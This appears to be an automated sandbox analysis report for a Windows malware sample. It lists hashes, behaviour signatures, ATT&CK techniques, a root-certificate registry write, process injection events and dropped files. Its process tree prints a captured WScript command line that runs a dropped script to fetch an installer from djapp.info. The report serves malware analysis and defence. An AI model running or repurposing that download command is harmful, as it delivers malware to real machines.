af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2

General

Target

af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe
Size

184KB
MD5

15036d06dd5d6e4514c9c04b9430539f
SHA1

99790d740a8b8648ca7ac312855693709f2293e8
SHA256

af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2
SHA512

ca3c3b2171d5bcf4a4a3cb92f0aa1f338e4da6d03602b1c2c5db2bb8c8a1acf5d6349bf2cf72e312c40d9325661fc2e33fd2b25577d41ffc470824a5c40212ec
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3sJ:/7BSH8zUB+nGESaaRvoB7FJNndnp

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
2	964	WScript.exe
6	964	WScript.exe
8	964	WScript.exe
10	964	WScript.exe
12	964	WScript.exe
13	576	WScript.exe
15	576	WScript.exe
19	576	WScript.exe
20	576	WScript.exe
22	576	WScript.exe
23	1032	WScript.exe
25	1032	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 904 wrote to memory of 964	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	27
PID 904 wrote to memory of 964	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	27
PID 904 wrote to memory of 964	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	27
PID 904 wrote to memory of 964	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	27
PID 904 wrote to memory of 576	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	30
PID 904 wrote to memory of 576	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	30
PID 904 wrote to memory of 576	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	30
PID 904 wrote to memory of 576	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	30
PID 904 wrote to memory of 1032	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	32
PID 904 wrote to memory of 1032	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	32
PID 904 wrote to memory of 1032	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	32
PID 904 wrote to memory of 1032	904	af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe	32

C:\Users\Admin\AppData\Local\Temp\af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe
"C:\Users\Admin\AppData\Local\Temp\af0d360b0fc259ec9cac70126ead5b82fd43731deb67d13c0f3df0f52a3f98a2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:904
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:964
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
  2⤵
  - Blocklisted process makes network request
  PID:576
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4616.js" http://www.djapp.info/?domain=sOnktQPxRB.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4616.exe
  2⤵
  - Blocklisted process makes network request
  PID:1032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
a4feaf11ab2269212883b999a17c7231

SHA1
73c157251f256fb9764366c49afd47fb55f466e1

SHA256
70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

SHA512
93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
986eda6a044d40b54bc41dfac0bfed2b

SHA1
d7928d9714ff509a0ba1f101be7307b01b785867

SHA256
ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

SHA512
b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
419af552b78f80bdf667bd19f98c0045

SHA1
32e18166c2a29a34c88a6ed952ed6b39e211cfad

SHA256
03bfa55eaa74437a357a0c95c4399889d771fb9eb29502993480ffca6ff12af0

SHA512
0cd2d083ba4ed8a82e2d187acd264dbe21698a0b61cd3d2d4bd7acfe236ff022ef255cc8e17abfaae265b2b783a5a7129a14daac9e30fb55814b5cb46177ea34

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
bf4e496e01e24a403ed7b988a56c1cb3

SHA1
94d722e3bebafb7e542e178aeb0e02a4b572310c

SHA256
f731137225f720ee77845b9a726632f2c3c0033232cdb6e14b75698667d2abb1

SHA512
9aa24849b8dc469d5930df77e7844fed3ed70f9c264013287da4afbcbc7287bce60a17860a1c9708771f82814145c98df1544b1b08e64c654b9212f099037a33

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
7185358ae2f9b17f8dddbbb4c81b02b6

SHA1
ce4bd3ff6cf55988b889b31401a3d2c1d286e204

SHA256
851a57422b4e5d43f4071fd2b789e2ba5d45726497d311f309554438a8bd5862

SHA512
535c321745d112b8be85736bc49d844f0e16a536da9d6871a6841fd1200e704760d34eb262ebd043b5d8731ce39730e6281531f5f838c2c982ac74497747a1bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BG9XQTG0\domain_profile[1].htm

Filesize
7KB

MD5
71ce327ca56796df44d415cc8272a82d

SHA1
377fba91cc2608f94d9a4ab5a699472aa261d24d

SHA256
66f12b95b1a4e51461f9f1f65224143da06888423f5af7c92a8bb524fd4d07df

SHA512
17e69c41ac701dd58bbeaa8db0cbd5d4080a6965356c5c4d1403e74e5d235942907a69e8da63a7762f2cacf6f7084905babdbcf90de76ed5c5cdd02b3542cdad

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf4616.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4D8143I1.txt

Filesize
175B

MD5
b9e917abbd1737873edccc63086e2366

SHA1
fbd25074c9fae3d69723c71aff37a311a90eb784

SHA256
f568e268e7c11c821045677cef6cab620ebd76536b2fc7bcd7edf2e9a797bb16

SHA512
a43d7e55c00296ca13c580e8f35e8c4a5fb151c89e727f7c517ba641661835bb376c879a447f8aa91fa460190dce2725965c2fafb100260fd8a8344ea82bb972

Download Submit
memory/904-54-0x0000000075021000-0x0000000075023000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing